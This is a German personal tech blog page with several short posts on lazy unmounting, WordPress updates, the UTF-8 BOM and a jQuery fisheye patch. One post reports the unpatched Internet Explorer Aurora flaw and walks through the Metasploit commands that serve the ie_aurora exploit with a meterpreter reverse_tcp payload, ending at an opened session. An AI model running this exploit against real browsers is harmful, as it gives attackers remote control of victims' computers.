monkey-business.biz

Wer kennt das nicht:

:~$ umount /media/disk/
umount: /media/disk: device is busy

“device is busy” – Der Wechseldatenträger lässt sich nicht aushängen, weil er gerade noch von einem Programm in Benutzung ist. Die Umount Option -f führt nicht zum Ziel. Auch wenn -f für “force” steht. Den Datenträger dennoch auszuhängen ist folgendermaßen möglich:

:~$ umount -l /dev/disk

In der Manpage steht zur Option -l:

“-l Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and cleanup all refer* ences to the filesystem as soon as it is not busy anymore. (Requires Kernel 2.4.11 or later.)”

Verspätet muss ich meine Freude über die Warnung des BSI vor dem Internet Explorer veröffentlichen. Der Fehler ist bisher noch ungepacht und schon seit einiger Zeit online erhältlich. Es sind die Versionen 6 – 8 von Microsofts Internet Explorer betroffen. Über diesen Schwachpunkt im Browser wurden bereits gezielte Angriffe auf Google und andere amerikanische Firmen verübt. Microsoft selber empfiehlt die Sicherheitseinstellungen im Internet Explorer auf “hoch” zu stellen. Das deaktivieren von Javascript reicht jedoch aus um der Gefahr des Internet Explorer Aurora Exploit zu entgehen. Inzwischen wurde das Exploit sogar in das Exploit Framework Metasploit aufgenommen. Um das “Internet Explorer Aurora Exploit” in die Finger zu bekommen muss man sich den aktuellen Snapshot via Subversion herunterladen. Die aktuelle Download Version war zum Veröffentlichungszeitpunkt das Metasploit Framework 3.3.3. Der Downloadvorgang ist denkbar einfach und schnell:

mkdir METASPLOITORDNER
cd METASPLOITORDNER
svn co https://www.metasploit.com/svn/framework3/trunk/

Das Aurora Exploit aus dem Metasploit Framework verwendet man folgendermaßen:

:~$ cd METASPLOITORDNER
:~$ msfconsole
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (deine IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.2.101:8080/
[*] Server started.

Nach dieser Ausgabe landet man wieder an einer Eingabeaufforderung.

msf exploit(ie_aurora) >

Nun wird mit dem Internet Explorer Kontakt zur eigenen IP Adresse aufgenommen. Wenn der Exploit erfolgreich ausgeführt wird erscheint die Ausgabe:

[*] Sending stage (723456 bytes)
[*] Loaden session 1 opened (192.168.2.101:4444 -> 192.168.0.2.101)

Metasploit bietet nun die Möglichkeit die Kontrolle des Rechners zu übernehmen. Darauf werde ich hier jedoch nicht weiter eingehen. Es lässt sich hoffen das es demnächst ein Update für den Internet Explorer geben wird.

Mein Wordpress Blog läuft jetzt auf der Version 2.9.1. Bei Versionsprung von 2.9 auf 2.9.1 wurden 26 Posten geschlossen. Nachdem ich beim googeln nichts von Problemen nach einem Update gefunden hatte, hatte ich den Mut die neue Version zu installieren. Auch bei mir verlief das Update reibungslos.

Ein neues Plugin habe ich ebenfalls installiert. Die Configurable Tag Cloud von Keith Solomon. Dieses Plugin ermöglicht es mir die Schlagwortwolke nach meine Wünschen zu konfigurieren. Ich blende beispielsweise alle Schlagworte die in weniger als 2 Artikeln vorhanden sind aus. Dadurch kann ich in kombination mit meinen Plugin Tags 2 Meta Keywords schnell und einfach beliebige Meta Keywords setzen die nicht weiter stören. Desweiteren braucht niemand Schlagwort Archive mit nur einem Beitrag. Einen Changelog sowie eine Freatures Liste findest du hier.

Bei Arbeiten wurde ich auf ein merkwürdiges Zeichen “” im HTML Dokument aufmerksam, weil dieses die Darstellung des Layouts beinträchtigte. Nach einiger Recherche fand ich heraus das es sich hierbei um das UTF-8 Byte Order Mark kurz BOM handelt. Das Byte Order Mark ist eine Bytefolge die von einigen Programmen verwendet wird um anzuzeigen das ein Dokument UTF-8 codiert ist. Anderen Programmen, wie Browsern, ist diese Bytefolge nicht geläufig. Häufig wird es dann in dieser Form  dargestellt.

Einen Webbasierenden Test ob das BOM in einem Dokument vorhanden ist findest du hier: BOM Tester

Während der Arbeit mit Wordpress ist mir aufgefallen das viele Plugins nach der Installation spuren in der Datenbank hinterlassen. Nach Tests mit einigen Plugins merkte ich, das die Datenbank sowohl um Einträge in “options” als auch um neue Spalten in Tabellen erweitert wurde. Schnell wurde mir klar das es sich um Überreste von bereits deinstallierten Plugins handelt.

Mich hätten die toten Einträge und Spalten in der Datenbank nicht gestört. Jedoch machten Performance Unterschiede bemerkbar. Ein Neuaufsetzen der Bloginstallation war angesagt…

Eine saubere Deinstallation sollte meiner Meinung nach in jedes Plugin implementiert werden. Solange dies nicht der Fall ist kann man keine Plugins am Entwicklungssystem des Kunden testen. Sondern muss sich ein Plugin-Test-System einrichten.

(to the english part of the post)
Dir wird in diesem Artikel der neue jQuery Interfaces Fisheye position: fixed; Patch zum herunterladen angeboten. Mit diesem Patch funktioniert das Fisheye auch nach dem Scrollen bei fixer Positionierung. Die Vorgehensweise ist denkbar einfach. Es muss nur der Patch nach der jQuery interfaces Datei eingebunden werden. Ein Beispiel folgt.

<script type="text/javascript" src="jquery.js"></script> <!--- jQuery Framework einbinden --->
<script type="text/javascript" src="interface.js"></script> <!--- jQuery interfaces Plugin einbinden --->
<script type="text/javascript" src="fisheye_patched.js"></script> <!--- hier den Patch einbinden --->

Fisheye position: fixed; Patch herunterladen

Zip Datei enthält Javascript Datei.

In this post you will be offered to download the jQuery Interfaces Fisheye position: fixed; patch. With this patch the Fisheye works after scrolling while it’s fixed positioned. The procedure is simple. You only need to include the patch after including the jQuery inferfaces file. An example follows.

<script type="text/javascript" src="jquery.js"></script> <!--- include jQuery Framework --->
<script type="text/javascript" src="interface.js"></script> <!--- include jQuery interfaces plugin --->
<script type="text/javascript" src="fisheye_patched.js"></script> <!---include the patch --->

Fisheye position: fixed; patch download

Zip file includes javascript file.